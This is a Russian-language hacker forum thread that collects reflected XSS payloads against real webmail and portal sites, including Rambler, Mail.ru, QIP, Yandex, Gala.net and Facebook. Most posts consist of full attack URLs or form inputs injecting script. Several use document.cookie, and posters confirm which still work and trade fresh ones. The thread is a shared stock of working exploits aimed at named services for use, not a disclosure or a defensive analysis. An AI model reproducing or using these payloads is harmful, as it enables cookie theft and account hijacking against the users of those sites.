Выкладываем только пассивные xss на почтовых серверах (для активных xss существует отдельная тема) Оффтоп наказуем p\s Невозбраняется выложить рабочии xss из аналогичной темы (в разделе Уязвимости), что канула в лету
http://top100.rambler.ru/cgi-bin/reg...p=0®=accept Во всех полях вставляем "><script>alert('xss')</script> http://goon.ru/i/phone/rus_moscow.htm В поле Поиск по фамилии "><script>alert('xss')</script> http://catalog.aport.ru/rus/add/AddUrl.aspx В Адрес ресурса вставляем "><script>alert('xss')</script>
Ramber.ru http://ds.rambler.ru/index.php?p=news&pubId=1365&pubMode="><script>alert(/TreV@N/)</script> http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5"><script>alert('TreV@N')</script>&form=0&hu=1&what=0 http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5&form=0&hu=1&what=0"><script>alert('TreV@N')</script> http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5&form=0"><script>alert('TreV@N')</script>&hu=1&what=0
Решил выложить XSS найденную лично мной Code: http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
пара уязвимостей на qip: http://pochta.qip.ru/mailbox/find/?actionID=1&search=%22%3E%3Cscript%3Ealert()%3C/script%3E http://file.qip.ru/preview.jsp?w=200'&h=200'&s=no&b=yes&l=http://slipknot1.ru%22%3E%3C/iframe%3E%3Cscript%3Ealert()%3C/script%3E
по твоему же примеру Code: http://nova.rambler.ru/srch?query=%3C%2Fscript%3E%3Cscript%3Ealert(%27XSS%27)%3C%2Fscript%3E
http://help.rambler.ru/feedback.html?s=7715&fio="><script>alert('XSS')</script> http://rasp.yandex.ru/info/996500"><script>alert('XSS')</script> http://horoscopes.rambler.ru/fortune.html?sec=56576"><script>alert('XSS')</script> http://story.travel.mail.ru/?mod=add_story&back="><script>alert(document.cookie)</script> http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert(document.cookie)</script> http://skate.rambler.ru/popup.html?alt=</title><script>alert(document.cookie)</script> http://www.pisem.net/download.php/?file="><script>alert('XSS')</script> http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script> http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script>
http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script> http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script> http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert('Luccifer')</script> http://top100.rambler.ru/cgi-bin/register.cgi?group=49®=accept в поле URL Вашей страницы: Код: "><script>alert(document.cookie)</script
Mail.сру http://content.mail.ru/search?q=%22%3E%3Cscript%3Ealert('Luccifer')%3C/script%3E http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1=phrase=&proto=1&url=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&title=&descr=&owner=&cperson=&email=&phone=&fax=&address=&keywords=&session_id=16073130&category_id=10993&category_name=%CC%E5%E4%E8%F6%E8%ED%E0+%E8+%E7%E4%EE%F0%EE%E2%FC%E5&page=1&save=1 http://hosting.mail.ru/lc.jsp?loginput=&login=%22%3E%3Cscript%3Ealert('Luccifer')%3C%2Fscript%3E&password= http://infobox.ru/index.php?=action=go&domain=%22%3E%3Cscript%3Ealert('Luccifer')%3C%2Fscript%3E&tld=ru&x=21&y=4 http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1 В поле сайтайта URL вводим: "><script>alert('Luccifer')</script> http://torg.mail.ru/used/res/?p3[vendor_name]=Intel&use_model_name=1&p3%22%3E%3Cscript%3Ealert('Luccifer')%3C/script%3E=470 http://hosting.mail.ru/ в поле логин вводим Код: "><script>alert('xss')</script>
http://ds.rambler.ru/index.php?p=news&pubId=000000000000000000000000000000000000000000000003&pubMode=%3Cscript%3Ealert()%3C/script%3E Была активная XSS, но топик для пассивных.
Ну опять хсс убитого рамблера на котором даже те что есть не фиксят. http://ftpsearch.rambler.ru/db/ftpsearch/search.html?btnG=%CD%E0%E9%F2%E8%21&words=(XSS)=5&form=0&hu=1&what=0 </title><script>alert('S0ulVortex')</script>
http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1 В поле сайтайта URL вводим: "><script>alert('Luccifer')</script> http://torg.mail.ru/used/res/?p3[vendor_name]=Intel&use_model_name=1&p3%22%3E%3Cscript%3Ealert('Luccifer')%3C/script%3E=470 уже не работают?или я не то делаю?
не работают. Code: http://list.mail.ru/cgi-bin/olympic_calendar.cgi?sport=%3C/textarea%3E%27%22%3E%3Cscript%3Ealert('xss%20by%20f02')%3C/script%3E эта работает.
Хз. Может кто и находил. Просто рамблер совсем не фиксит XSS. Иметь там почтовый ящик не знающим просто опасно
Gala.net Code: http://forum.gala.net/?ff=1012&page=search&q=%22%2F%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&opt=and
ВШтате Code: http://vshtate.ru/reg?op=message&email=[COLOR=Yellow][B][XSS][/COLOR][/B] Но если авторизован, то не пашет Короче, бесполезная В профиле при добавлении инфы во многие поля срабатывает код, но сохраняется в отфильтрованом виде. Непохек
Facebook.com Code: http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript %3Ealert(document.cookie)%3C/script%3E только толку от нее нету
